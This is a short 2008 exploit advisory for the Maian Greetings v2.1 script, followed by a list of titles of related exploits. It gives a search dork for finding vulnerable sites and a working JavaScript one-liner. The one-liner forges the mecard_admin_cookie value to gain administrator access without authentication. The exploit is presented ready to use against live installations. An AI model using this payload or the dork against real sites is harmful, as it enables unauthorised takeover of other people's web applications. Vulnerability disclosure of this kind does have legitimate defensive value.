Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
【Maian Greetings 2.1 Insecure Cookie Handling Vulnerability】相关文章:
★ Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ Maian Events 2.0 Insecure Cookie Handling Vulnerability
★ BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
★ Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
★ Dreampics Builder (page) Remote SQL Injection Vulnerability
★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit